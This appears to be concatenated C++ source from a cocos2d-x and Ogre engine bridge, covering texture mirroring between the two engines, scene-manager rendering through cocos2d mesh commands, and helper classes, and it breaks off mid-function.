    ParticleUniverse::EventType::PU_EVT_SYSTEM_DELETING, // Submit event when the particle system is being deleted.
    ParticleUniverse::EventType::PU_EVT_LOD_TRANSITION, // Submit event when the particle system switches to another technique when a LOD-level is exceeded.
    ParticleUniverse::EventType::PU_EVT_EMITTER_STARTED, // Submit event when an emitter is started.
    ParticleUniverse::EventType::PU_EVT_EMITTER_STOPPED, // Submit event when an emitter is stopped.
    ParticleUniverse::EventType::PU_EVT_NO_PARTICLES_LEFT, // Submit event when all particles have been expired.*/
}
NS_CC_END<file_sep>#ifndef OGRE_APP_MGR_H
#define OGRE_APP_MGR_H
#include "cocos2d.h"
namespace Ogre
{
class Root;
class Entity;
class Camera;
class Viewport;
class RenderWindow;
class RenderSystem;
class BridgeSceneManager;
class ScriptLoader;
class MovableObject;
class SceneManager;
}
namespace ParticleUniverse
{
class ParticleSystem;
}
NS_CC_BEGIN
// Singleton facade over the embedded Ogre runtime: owns the Root, scene
// manager, camera/viewport/window and render system, and provides factory
// helpers for entities, Particle Universe systems and resource scripts.
class OgreManager
{
public: //root
    void initialize();
    void purge();
    ParticleUniverse::ParticleSystem* createParticleSystem(const std::string &typeName,const std::string &entityName);
    void destroyParticleSystem(ParticleUniverse::ParticleSystem* particleSystem);
    Ogre::Entity* createEntity(const std::string &fileName);
    void destroyEntity(Ogre::Entity* entity);
    // Register/unregister a single resource file with the given resource
    // group (note: parameter name "grop" is a historical typo for "group").
    void addResourceByName(const std::string &name, const std::string &grop = "General");
    void removeResourceByName(const std::string &name, const std::string &grop = "General");
    static OgreManager *getInstance();
    Ogre::Camera* getCamera();
    Ogre::RenderSystem* getRenderSystem();
    Ogre::SceneManager* getSceneManager();
CC_CONSTRUCTOR_ACCESS:
    OgreManager();
    virtual ~OgreManager();
protected:
    // Feeds a resource to a script loader when its name matches one of the
    // loader's script patterns; returns true if the loader parsed it.
    bool addResourceForManager(const std::string &, const std::string &, Ogre::ScriptLoader *);
    Ogre::Root *mRoot;
    Ogre::Camera* mCamera;
    Ogre::Viewport* mViewport;
    Ogre::RenderWindow* mWindow;
    Ogre::RenderSystem *mRenderSystem;
    Ogre::BridgeSceneManager *mSceneMgr;
};
NS_CC_END
#endif//OGRE_APP_MGR_H
<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Torus Knot Software Ltd
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreBridgeTextureManager.h"
#include "OgreRoot.h"
#include "OgreRenderSystem.h"
#include "OgreHardwarePixelBuffer.h"
#include "renderer/CCVertexIndexBuffer.h"
#include "base/CCEventType.h"
#include "base/CCEventListenerCustom.h"
#include "base/CCEventDispatcher.h"
#include "base/CCDirector.h"
#include "2d/CCSpriteFrameCache.h"
#include "renderer/CCTextureCache.h"
#include "renderer/CCTexture2D.h"
#include "renderer/CCRenderer.h"
#include "base/CCDirector.h"
namespace Ogre {
// Maps a cocos2d texture pixel format onto the closest Ogre::PixelFormat.
// Compressed formats without a direct Ogre equivalent fall through to
// PF_UNKNOWN. (The "covert" spelling is a historical typo kept because
// callers in this file use that name.)
// NOTE(review): the BGRA8888 -> PF_A8B8G8R8 and RGBA8888 -> PF_A8R8G8B8
// pairings look swapped relative to Ogre's component-order naming --
// confirm against the renderer that consumes mFormat.
static inline Ogre::PixelFormat covertPixFormat(cocos2d::Texture2D::PixelFormat format)
{
    Ogre::PixelFormat result;
    switch (format)
    {
    //! 32-bit texture: BGRA8888
    case cocos2d::Texture2D::PixelFormat::BGRA8888:
        result = PF_A8B8G8R8;
        break;
    //! 32-bit texture: RGBA8888
    case cocos2d::Texture2D::PixelFormat::RGBA8888:
        result = PF_A8R8G8B8;
        break;
    //! 24-bit texture: RGBA888
    case cocos2d::Texture2D::PixelFormat::RGB888:
        result = PF_R8G8B8;
        break;
    //! 16-bit texture without Alpha channel
    case cocos2d::Texture2D::PixelFormat::RGB565:
        result = PF_R5G6B5;
        break;
    //! 8-bit textures used as masks
    case cocos2d::Texture2D::PixelFormat::A8:
        result = PF_A8;
        break;
    //! 8-bit intensity texture
    case cocos2d::Texture2D::PixelFormat::I8:
        result = PF_L8;
        break;
    //! 16-bit textures used as masks
    case cocos2d::Texture2D::PixelFormat::AI88:
        result = PF_BYTE_LA;
        break;
    //! 16-bit textures: RGBA4444
    case cocos2d::Texture2D::PixelFormat::RGBA4444:
        result = PF_A4R4G4B4;
        break;
    //! 16-bit textures: RGB5A1
    case cocos2d::Texture2D::PixelFormat::RGB5A1:
        result = PF_A1R5G5B5;
        break;
    //! 4-bit PVRTC-compressed texture: PVRTC4
    case cocos2d::Texture2D::PixelFormat::PVRTC4:
        result = PF_PVRTC_RGB4;
        break;
    //! 4-bit PVRTC-compressed texture: PVRTC4 (has alpha channel)
    case cocos2d::Texture2D::PixelFormat::PVRTC4A:
        result = PF_PVRTC_RGBA4;
        break;
    //! 2-bit PVRTC-compressed texture: PVRTC2
    case cocos2d::Texture2D::PixelFormat::PVRTC2:
        result = PF_PVRTC_RGB2;
        break;
    //! 2-bit PVRTC-compressed texture: PVRTC2 (has alpha channel)
    case cocos2d::Texture2D::PixelFormat::PVRTC2A:
        result = PF_PVRTC_RGBA2;
        break;
    //! ETC-compressed texture: ETC
    case cocos2d::Texture2D::PixelFormat::ETC:
    //! S3TC-compressed texture: S3TC_Dxt1
    case cocos2d::Texture2D::PixelFormat::S3TC_DXT1:
    //! S3TC-compressed texture: S3TC_Dxt3
    case cocos2d::Texture2D::PixelFormat::S3TC_DXT3:
    //! S3TC-compressed texture: S3TC_Dxt5
    case cocos2d::Texture2D::PixelFormat::S3TC_DXT5:
    //! ATITC-compressed texture: ATC_RGB
    case cocos2d::Texture2D::PixelFormat::ATC_RGB:
    //! ATITC-compressed texture: ATC_EXPLICIT_ALPHA
    case cocos2d::Texture2D::PixelFormat::ATC_EXPLICIT_ALPHA:
    //! ATITC-compressed texture: ATC_INTERPOLATED_ALPHA
    case cocos2d::Texture2D::PixelFormat::ATC_INTERPOLATED_ALPHA:
    //! Default texture format: AUTO
    default: // Texture2D::PixelFormat::DEFAULT = AUTO:
        result = PF_UNKNOWN;
        break;
    };
    return result;
}
// Maps an Ogre texture type onto the matching GL texture binding target.
// 1D textures are treated as 2D (GLES has no 1D target); anything beyond
// 2D/cube (e.g. 3D) yields 0, meaning "no GL target".
static inline GLenum getBridgeTextureTarget(TextureType texType)
{
    if (texType == TEX_TYPE_1D || texType == TEX_TYPE_2D)
        return GL_TEXTURE_2D;
    if (texType == TEX_TYPE_CUBE_MAP)
        return GL_TEXTURE_CUBE_MAP;
    return 0;
}
// Ogre Texture backed by cocos2d Texture2D objects; the GL id is not
// created here but mirrored from the cocos texture in prepareImpl().
BridgeTexture::BridgeTexture(ResourceManager* creator, const String& name,
ResourceHandle handle, const String& group, bool isManual,
ManualResourceLoader* loader)
: Texture(creator, name, handle, group, isManual, loader),
mTextureID(0)
{
}
BridgeTexture::~BridgeTexture()
{
    // have to call this here rather than in Resource destructor
    // since calling virtual methods in base destructors causes crash
    // NOTE(review): the unload/free logic below is disabled, so the cocos
    // textures referenced by mCocosTextureList are never released here --
    // confirm their lifetime is managed elsewhere (e.g. TextureCache).
    /*if (isLoaded())
    {
    unload();
    }
    else
    {
    freeInternalResources();
    }*/
}
// Creation / loading methods
// Nothing is allocated here: the GL texture id of the first cocos2d
// texture prepared for this resource (see prepareImpl) is mirrored.
void BridgeTexture::createInternalResourcesImpl(void)
{
    if(!mCocosTextureList.empty())
    {
        mTextureID = mCocosTextureList[0]->getName();
    }
}
void BridgeTexture::createRenderTexture(void)
{
    // Create the GL texture
    // This already does everything necessary
    createInternalResources();
}
// Fallback pixels for a 2x2 opaque white placeholder texture.
static unsigned char cc_2x2_white_image[] = {
    // RGBA8888
    0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF, 0xFF
};
#define CC_2x2_WHITE_IMAGE_KEY "/cc_2x2_white_image"
// Loads the backing image through cocos2d: first the TextureCache is
// consulted, then the file is loaded from disk, and as a last resort a
// 2x2 white placeholder is used. The cocos texture's GL id and metrics
// are then mirrored into this Ogre texture.
// NOTE(review): a texture created via the disk-load path is allocated
// with `new` but never added to the cache or released by this class
// (see the disabled destructor logic) -- possible leak, confirm.
void BridgeTexture::prepareImpl()
{
    if (mUsage & TU_RENDERTARGET) return;
    if (mTextureType == TEX_TYPE_1D || mTextureType == TEX_TYPE_2D)
    {
        bool bRet = false;
        cocos2d::Texture2D *texture = nullptr;
        do
        {
            // Fast path: the texture is already cached under this name.
            texture = cocos2d::Director::getInstance()->getTextureCache()->getTextureForKey(mName);
            CC_BREAK_IF(nullptr != texture);
            std::string fullpath = cocos2d::FileUtils::getInstance()->fullPathForFilename(mName);
            CC_BREAK_IF(fullpath.empty());
            cocos2d::Image* image = new (std::nothrow) cocos2d::Image();
            CC_BREAK_IF(nullptr == image);
            bRet = image->initWithImageFile(fullpath);
            CC_BREAK_IF(!bRet);
            texture = new (std::nothrow) cocos2d::Texture2D();
            texture->initWithImage(image,cocos2d::Texture2D::PixelFormat::RGBA8888);//texture->initWithData(image->getData(),image->getDataLen(),cocos2d::Texture2D::PixelFormat::BGRA8888,image->getWidth(),image->getHeight(),cocos2d::Size(image->getWidth(),image->getHeight()));
            CC_SAFE_RELEASE(image);
        }while(0);
        if(!texture)
        {
            // Fall back to the shared 2x2 white placeholder texture.
            texture = cocos2d::Director::getInstance()->getTextureCache()->addImage(CC_2x2_WHITE_IMAGE_KEY);
            if(nullptr == texture)
            {
                cocos2d::Image* image = new (std::nothrow) cocos2d::Image();
                bool isOK = image->initWithRawData(cc_2x2_white_image, sizeof(cc_2x2_white_image), 2, 2, 8);
                CC_UNUSED_PARAM(isOK);
                CCASSERT(isOK, "The 2x2 empty texture was created unsuccessfully.");
                texture = cocos2d::Director::getInstance()->getTextureCache()->addImage(image,CC_2x2_WHITE_IMAGE_KEY);
                CC_SAFE_RELEASE(image);
            }
        }
        // Mirror the cocos texture's GL name and metrics into Ogre's view.
        mTextureID = texture->getName();
        mCocosTextureList.push_back(texture);
        mDepth = 1;
        mNumMipmaps = 0;
        mWidth = texture->getContentSize().width;
        mHeight = texture->getContentSize().height;
        mFormat = covertPixFormat(texture->getPixelFormat());
    }
}
// Drops the staged image list; the cocos texture itself stays alive.
void BridgeTexture::unprepareImpl()
{
    mLoadedImages.setNull();
}
// For render targets the GL id is (re)mirrored; for regular textures the
// upload path is disabled because the cocos texture already owns the
// GL-side data (the original image-upload code is kept for reference).
void BridgeTexture::loadImpl()
{
    if (mUsage & TU_RENDERTARGET)
    {
        createRenderTexture();
        return;
    }
    /*
    // Now the only copy is on the stack and will be cleaned in case of
    // exceptions being thrown from _loadImages
    LoadedImages loadedImages = mLoadedImages;
    mLoadedImages.setNull();
    // Call internal _loadImages, not loadImage since that's external and
    // will determine load status etc again
    ConstImagePtrList imagePtrs;
    for (size_t i = 0; i < loadedImages->size(); ++i)
    {
    imagePtrs.push_back(&(*loadedImages)[i]);
    }
    _loadImages(imagePtrs);*/
}
// GL resource release is disabled: the texture id belongs to cocos2d's
// Texture2D, so Ogre must not delete it.
void BridgeTexture::freeInternalResourcesImpl()
{
    /* mSurfaceList.clear();
    glDeleteTextures(1, &mTextureID);
    CHECK_GL_ERROR_DEBUG();*/
}
// Intentionally empty: per-face/per-mip hardware pixel buffers are not
// exposed by this bridge texture (getBuffer() always throws). The GLES2
// implementation is kept below, disabled, for reference.
void BridgeTexture::_createSurfaceList()
{
    /*mSurfaceList.clear();
    // For all faces and mipmaps, store surfaces as HardwarePixelBufferSharedPtr
    bool wantGeneratedMips = (mUsage & TU_AUTOMIPMAP)!=0;
    // Do mipmapping in software? (uses GLU) For some cards, this is still needed. Of course,
    // only when mipmap generation is desired.
    bool doSoftware = wantGeneratedMips && !mMipmapsHardwareGenerated && getNumMipmaps();
    for (size_t face = 0; face < getNumFaces(); face++)
    {
    size_t width = mWidth;
    size_t height = mHeight;
    for (size_t mip = 0; mip <= getNumMipmaps(); mip++)
    {
    GLES2HardwarePixelBuffer *buf = OGRE_NEW BridgeTextureBuffer(mName,
    getBridgeTextureTarget(),
    mTextureID,
    width, height,
    GLES2PixelUtil::getClosestGLInternalFormat(mFormat, mHwGamma),
    GLES2PixelUtil::getGLOriginDataType(mFormat),
    face,
    mip,
    static_cast<HardwareBuffer::Usage>(mUsage),
    doSoftware && mip==0, mHwGamma, mFSAA);
    mSurfaceList.push_back(HardwarePixelBufferSharedPtr(buf));
    // Check for error
    if (buf->getWidth() == 0 ||
    buf->getHeight() == 0 ||
    buf->getDepth() == 0)
    {
    OGRE_EXCEPT(
    Exception::ERR_RENDERINGAPI_ERROR,
    "Zero sized texture surface on texture "+getName()+
    " face "+StringConverter::toString(face)+
    " mipmap "+StringConverter::toString(mip)+
    ". The GL driver probably refused to create the texture.",
    "BridgeTexture::_createSurfaceList");
    }
    }
    }*/
}
// Returns the pixel buffer for the given face/mip level.
//
// NOTE: surface lists are not built in this bridge (_createSurfaceList is
// disabled), so after validating its arguments this method always throws.
// The final exception used to be a copy-pasted "Mipmap index out of range",
// which made every in-range request look like a caller error; it now
// reports the real condition (not implemented).
HardwarePixelBufferSharedPtr BridgeTexture::getBuffer(size_t face, size_t mipmap)
{
    if (face >= getNumFaces())
    {
        OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
            "Face index out of range",
            "BridgeTexture::getBuffer");
    }
    if (mipmap > mNumMipmaps)
    {
        OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
            "Mipmap index out of range",
            "BridgeTexture::getBuffer");
    }
    // No surface list exists to return a buffer from.
    OGRE_EXCEPT(Exception::ERR_NOT_IMPLEMENTED,
        "Surface buffers are not implemented for BridgeTexture",
        "BridgeTexture::getBuffer");
    return HardwarePixelBufferSharedPtr();  // unreachable; keeps signature satisfied
}
// Registers this manager with the resource group manager so texture
// resources of mResourceType are routed to it (undone in the destructor).
BridgeHardwareTextureManager::BridgeHardwareTextureManager()
    : TextureManager()
{
    // Register with group manager
    ResourceGroupManager::getSingleton()._registerResourceManager(mResourceType, this);
}
// Counterpart of the constructor: detaches this manager from the resource
// group manager.
BridgeHardwareTextureManager::~BridgeHardwareTextureManager()
{
    // Unregister with group manager
    ResourceGroupManager::getSingleton()._unregisterResourceManager(mResourceType);
}
// ResourceManager factory hook: instantiates a BridgeTexture for the given
// resource parameters.  createParams is accepted but not consumed here.
Resource* BridgeHardwareTextureManager::createImpl(const String& name, ResourceHandle handle,
    const String& group, bool isManual,
    ManualResourceLoader* loader,
    const NameValuePairList* createParams)
{
    return OGRE_NEW BridgeTexture(this, name, handle, group, isManual, loader);
}
//-----------------------------------------------------------------------------
// Creates the fallback "warning" material.  Only the BaseWhite material is
// registered; the original texture-based warning resource remains disabled
// (see the commented line below).
void BridgeHardwareTextureManager::createWarningTexture()
{
    MaterialManager::getSingleton().create(
        "BaseWhite",
        ResourceGroupManager::AUTODETECT_RESOURCE_GROUP_NAME);
    //MaterialManager::getSingleton().create("W"); "BaseWhite"ResourceGroupManager::AUTODETECT_RESOURCE_GROUP_NAME
}
// Maps a requested pixel format to the closest format the active render
// system can actually handle; unsupported compressed / floating-point
// formats degrade to PF_A8R8G8B8.
PixelFormat BridgeHardwareTextureManager::getNativeFormat(TextureType ttype, PixelFormat format, int usage)
{
    const RenderSystemCapabilities *rsc =
        Root::getSingleton().getRenderSystem()->getCapabilities();

    // Compressed formats need either DXT or PVRTC hardware decompression.
    const bool compressedUnsupported =
        PixelUtil::isCompressed(format) &&
        !rsc->hasCapability(RSC_TEXTURE_COMPRESSION_DXT) &&
        !rsc->hasCapability(RSC_TEXTURE_COMPRESSION_PVRTC);
    if (compressedUnsupported)
        return PF_A8R8G8B8;

    // Floating-point formats need RSC_TEXTURE_FLOAT.
    const bool floatUnsupported =
        PixelUtil::isFloatingPoint(format) && !rsc->hasCapability(RSC_TEXTURE_FLOAT);
    if (floatUnsupported)
        return PF_A8R8G8B8;

    // Render targets would normally be remapped to the closest RTT-capable
    // alternative; that path is not wired up in this bridge yet.
    if (usage & TU_RENDERTARGET)
    {
        //return GLES2RTTManager::getSingleton().getSupportedAlternative(format);
    }

    // Anything else is assumed natively supported.
    return format;
}
// Reports whether hardware texture filtering is available for the given
// format.  Unknown formats never filter; with preciseFormatOnly the native
// format must match the request exactly; otherwise filtering is assumed for
// every non-floating-point native format.
bool BridgeHardwareTextureManager::isHardwareFilteringSupported(TextureType ttype, PixelFormat format, int usage,
    bool preciseFormatOnly)
{
    if (PF_UNKNOWN == format)
        return false;

    // Resolve what the hardware would actually store.
    const PixelFormat native = getNativeFormat(ttype, format, usage);
    if (preciseFormatOnly && native != format)
        return false;

    // Non-floating-point formats are always assumed filterable.
    return !PixelUtil::isFloatingPoint(native);
}
}
<file_sep>#ifndef __CC_Node_Protocol_H__
#define __CC_Node_Protocol_H__
#include <cocos2d.h>
#include <OgreSceneNode.h>
NS_CC_BEGIN
class NodeProtocol;
NS_CC_END
namespace Ogre
{
class Node;
class QueueVisitor;
// Snapshot of the GL / cocos2d state needed to replay one Ogre renderable
// through the cocos2d renderer.
struct RenderState
{
public:
    bool _visible;            // whether this renderable should be drawn
    bool isTransparent;       // queue in the transparent pass
    bool isDepthTestEnabled;
    bool isDepthWriteEnabled;
    GLuint textureId;         // GL texture object id
    GLuint vertexBufferId;    // GL vertex buffer (VBO) id
    GLuint indexBufferId;     // GL index buffer (IBO) id
    GLuint indexBufferType;   // index element type (presumably GL_UNSIGNED_SHORT/INT — verify)
    GLuint indexCount;        // number of indices to draw
    GLuint operationType;     // GL primitive type (e.g. GL_TRIANGLES)
    cocos2d::Mat4 mat4;       // world transform handed to the mesh command
    cocos2d::BlendFunc blend; // source/destination blend factors
    cocos2d::MeshCommand meshCommand;        // cocos2d draw command owned by this state
    cocos2d::GLProgramState *glProgramState; // shader state; ownership not visible here
    RenderState();
    // Both copy-constructor overloads are declared: non-const (binds to
    // mutable lvalues) and the conventional const form.
    RenderState(RenderState&);
    RenderState(const RenderState&);
};
}
typedef std::vector<Ogre::RenderState> OgreRenderStateVector;
typedef std::vector<cocos2d::MeshCommand *> MeshCommandVector;
typedef std::vector<cocos2d::GLProgramState *> ProgramStateVector;
typedef std::unordered_map<const Ogre::Renderable *,Ogre::RenderState> MeshStateMap;
NS_CC_BEGIN
/*
class NodeProtocol :
public Ogre::SceneNode
{
public:
NodeProtocol(Ogre::SceneManager * creator);
NodeProtocol(Ogre::SceneManager * creator,const std::string &name);
virtual ~NodeProtocol();
void setCocosMatrix4(const cocos2d::Mat4 &);
MeshStateMap &getRenderStates();
void updateRenderQueue();
virtual Ogre::Node* createChildImpl(void) override;
virtual Ogre::Node* createChildImpl(const Ogre::String & name) override;
*virtual const Ogre::Vector3 & _getDerivedScale(void) const override;
virtual const Ogre::Vector3 & _getDerivedPosition(void) const override;
virtual const Ogre::Quaternion & _getDerivedOrientation(void) const override;*
protected:
Ogre::Vector3 mCocosScale;
Ogre::Vector3 mCocosPosition;
Ogre::Quaternion mCocosQuaternion;
MeshStateMap mRenderStateMap;
};*/
NS_CC_END
#endif // __CC_Node_Protocol_H__
<file_sep>#ifndef __BERYL_SCRIPT_CALLFUNC_HELPER_H__
#define __BERYL_SCRIPT_CALLFUNC_HELPER_H__
#include "cocos2d.h"
NS_CC_BEGIN
// Bridges script-side callbacks into C++: keeps a script handler id plus a
// dispatcher std::function, and forwards cocos2d Values to it.
class ScriptCallFuncHelper : public Ref
{
public:
    // Factory helpers following the cocos2d create() idiom (autorelease
    // semantics not visible here — see the .cpp).
    static ScriptCallFuncHelper *create();
    static ScriptCallFuncHelper *create(int id);
    // Stores / clears the script handler id used when dispatching.
    void addScriptListener(int id);
    void removeScriptListener();
    // Dispatches `value` through the registered handler.  (Name keeps the
    // original spelling; "excute" is a typo for "execute" but is public API.)
    void excuteScript(const Value &value);
    // Installs the dispatcher that excuteScript invokes with (value, id).
    void registerScriptManager(const std::function<void(const Value &value,int id)>& func);
CC_CONSTRUCTOR_ACCESS:
    ScriptCallFuncHelper();
    virtual ~ScriptCallFuncHelper();
protected:
    int mhandlerId;  // current script handler id
    std::function<void(const Value &value,int id)> mScriptManagerHandler;  // dispatcher
private:
    CC_DISALLOW_COPY_AND_ASSIGN(ScriptCallFuncHelper);
};
NS_CC_END
#endif //__BERYL_SCRIPT_CALLFUNC_HELPER_H__<file_sep>#include "OgreBridgeSceneManager.h"
#include "cocos2d.h"
#include <Ogre.h>
#include <OgreCodec.h>
#include "components/OgreBridgeBufferManager.h"
USING_NS_CC;
namespace Ogre {
//-----------------------------------------------------------------------
const String BridgeSceneManagerFactory::FACTORY_TYPE_NAME = "BridgeSceneManager";
//-----------------------------------------------------------------------
// Detaches this scene manager from the Ogre pipeline: clears the current
// viewport/camera, pops this manager off Root's scene-manager stack and
// unhooks the queued-renderable visitor and auto-param source.
// Counterpart of initSceneManager().
void BridgeSceneManager::clearSceneManager()
{
    mCurrentViewport = NULL;
    mCameraInProgress = NULL;
    Root::getSingleton()._popCurrentSceneManager(this);
    mActiveQueuedRenderableVisitor->targetSceneMgr = NULL;
    mAutoParamDataSource->setCurrentSceneManager(NULL);
}
//-----------------------------------------------------------------------
void BridgeSceneManager::initRenderQueue(void)
{
mBridgeRenderQueue = OGRE_NEW BridgeRenderQueue();
mRenderQueue = mBridgeRenderQueue;
// init render queues that do not need shadows
mRenderQueue->getQueueGroup(RENDER_QUEUE_BACKGROUND)->setShadowsEnabled(false);
mRenderQueue->getQueueGroup(RENDER_QUEUE_OVERLAY)->setShadowsEnabled(false);
mRenderQueue->getQueueGroup(RENDER_QUEUE_SKIES_EARLY)->setShadowsEnabled(false);
mRenderQueue->getQueueGroup(RENDER_QUEUE_SKIES_LATE)->setShadowsEnabled(false);
}
// Wires this scene manager into the Ogre root and records the cocos2d
// shader program used for drawing.  Counterpart of clearSceneManager().
void BridgeSceneManager::initSceneManager(Viewport *vPort, Camera *camera, cocos2d::GLProgram *program)
{
    mShaderProgram = program;
    mCurrentViewport = vPort;
    mCameraInProgress = camera;
    initRenderQueue();
    Root::getSingleton()._pushCurrentSceneManager(this);
    mActiveQueuedRenderableVisitor->targetSceneMgr = this;
    mAutoParamDataSource->setCurrentSceneManager(this);
}
// Pre-frame hook; intentionally empty in this bridge.
void BridgeSceneManager::_beforeRender()
{
}
// Rebuilds the per-object renderable lists and submits every transparent
// renderable (with its matching program state and mesh command) to the
// cocos2d renderer via _render().
void BridgeSceneManager::_draw(MovableObject *object,cocos2d::Renderer *render)
{
    BridgeRenderQueue *queue = mBridgeRenderQueue;

    // Start from empty lists, then let the object enqueue itself.
    queue->mSolidRenderable.clear();
    queue->mTransparentRenderable.clear();
    object->_updateRenderQueue(mRenderQueue);

    queue->mIndex = 0;
    const int count = (int)queue->mTransparentRenderable.size();
    for (int idx = 0; idx < count; ++idx)
    {
        // Parallel arrays: renderable[i] pairs with program/command [i].
        _render(queue->mTransparentRenderable[idx],
                render,
                queue->mProgramState[idx],
                queue->mMeshCommand[idx]);
    }
}
// Would replay the queued transparent renderables using the bridge shader.
// NOTE: the per-renderable _render(...) call is commented out, so this
// currently only binds the shader and walks the list without drawing.
void BridgeSceneManager::_render()
{
    if (mShaderProgram && mRenderQueue)
    {
        mShaderProgram->use();
        int size = mBridgeRenderQueue->mTransparentRenderable.size();
        for(int i = 0;i < size ; i++)
        {
            auto program = mBridgeRenderQueue->mProgramState[i];
            auto meshCommand = mBridgeRenderQueue->mMeshCommand[i];
            //_render(mBridgeRenderQueue->mTransparentRenderable[i],NULL,program,meshCommand);
        }
    }
}
// Translates one Ogre RenderablePass into a cocos2d MeshCommand and queues
// it on the given renderer.  This is an in-progress port of Ogre's
// SceneManager::renderSingleObject(): texture binding, culling, polygon
// mode, lighting and depth state are retained below as commented-out
// reference code and are NOT yet active.
//
// FIX in this revision: cctextureId, vecGlBufferId and bufferId could reach
// cmd->init()/genMaterialID() uninitialized (their assignments are either
// commented out or conditional); they are now zero-initialized so the mesh
// command receives deterministic values until the binding code is restored.
void BridgeSceneManager::_render(Ogre::RenderablePass &obj,cocos2d::Renderer *render,cocos2d::GLProgramState *programstate,cocos2d::MeshCommand *cmd)
{
    if (mShaderProgram && mRenderQueue)
    {
        mShaderProgram->use();
        const Pass *pass = obj.pass;
        Renderable *rend = obj.renderable;
        // Blend state comes straight from the Ogre pass.
        cocos2d::BlendFunc _blend;
        _blend.src = pass->getSourceBlendFactor();
        _blend.dst = pass->getDestBlendFactor();
        GL::blendFunc(_blend.src, _blend.dst);
        // Give SM a chance to eliminate
        Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
        size_t unit = 0;
        // Reset the shadow texture index for each pass
        /*while(texIter.hasMoreElements())
        {
            TextureUnitState* pTex = texIter.getNext();
            if (pTex->getContentType() == TextureUnitState::CONTENT_COMPOSITOR)
            {
                CompositorChain* currentChain = _getActiveCompositorChain();
                if (!currentChain)
                {
                    OGRE_EXCEPT(Exception::ERR_INVALID_STATE,
                        "A pass that wishes to reference a compositor texture "
                        "attempted to render in a pipeline without a compositor",
                        "SceneManager::_setPass");
                }
                CompositorInstance* refComp = currentChain->getCompositor(pTex->getReferencedCompositorName());
                if (refComp == 0)
                {
                    OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
                        "Invalid compositor content_type compositor name",
                        "SceneManager::_setPass");
                }
                Ogre::TexturePtr refTex = refComp->getTextureInstance(
                    pTex->getReferencedTextureName(), pTex->getReferencedMRTIndex());
                if (refTex.isNull())
                {
                    OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
                        "Invalid compositor content_type texture name",
                        "SceneManager::_setPass");
                }
                pTex->_setTexturePtr(refTex);
            }
            //mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
            ++unit;
        }
        // Disable remaining texture units
        mDestRenderSystem->_disableTextureUnitsFrom(pass->getNumTextureUnitStates());
        */
        // Culling mode
        /*if (isShadowTechniqueTextureBased()
            && mIlluminationStage == IRS_RENDER_TO_TEXTURE
            && mShadowCasterRenderBackFaces
            && pass->getCullingMode() == CULL_CLOCKWISE)
        {
            // render back faces into shadow caster, can help with depth comparison
            mPassCullingMode = CULL_ANTICLOCKWISE;
        }
        else
        {
            mPassCullingMode = pass->getCullingMode();
        }
        //mDestRenderSystem->_setCullingMode(mPassCullingMode);
        GLenum cullMode;
        switch( mPassCullingMode )
        {
        case CULL_NONE:
            glDisable(GL_CULL_FACE);
            CHECK_GL_ERROR_DEBUG();;
        default:
        case CULL_CLOCKWISE:
            cullMode = GL_BACK;
            break;
        case CULL_ANTICLOCKWISE:
            cullMode = GL_BACK;
            break;
        }
        glEnable(GL_CULL_FACE);
        CHECK_GL_ERROR_DEBUG();;
        glCullFace(cullMode);
        CHECK_GL_ERROR_DEBUG();;
        */
        unsigned short numMatrices;
        RenderOperation ro;
        //OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
        // Set up rendering operation
        // I know, I know, const_cast is nasty but otherwise it requires all internal
        // state of the Renderable assigned to the rop to be mutable
        const_cast<Renderable*>(rend)->getRenderOperation(ro);
        ro.srcRenderable = rend;
        GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
        bool passTransformState = true;
        if (vprog)
        {
            passTransformState = vprog->getPassTransformStates();
        }
        // Set world transformation
        numMatrices = rend->getNumWorldTransforms();
        if (numMatrices > 0)
        {
            rend->getWorldTransforms(mTempXform);
            if (mCameraRelativeRendering && !rend->getUseIdentityView())
            {
                for (unsigned short i = 0; i < numMatrices; ++i)
                {
                    mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
                }
            }
            /*if (passTransformState)
            {
                if (numMatrices > 1)
                {
                    mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
                }
                else
                {
                    mDestRenderSystem->_setWorldMatrix(*mTempXform);
                }
            }*/
        }
        // Issue view / projection changes if any
        //useRenderableViewProjMode(rend, passTransformState);
        // mark per-object params as dirty
        //mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
        // Zero-initialized: the texture-binding code that assigned
        // cctextureId is commented out below, and vecGlBufferId is only set
        // when at least one vertex element is bound.
        int cctextureId = 0;
        int vecGlBufferId = 0;
        if (!mSuppressRenderStateChanges)
        {
            bool passSurfaceAndLightParams = true;
            // Reissue any texture gen settings which are dependent on view matrix
            Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
            size_t unit = 0;
            while (texIter.hasMoreElements())
            {
                TextureUnitState* pTex = texIter.getNext();
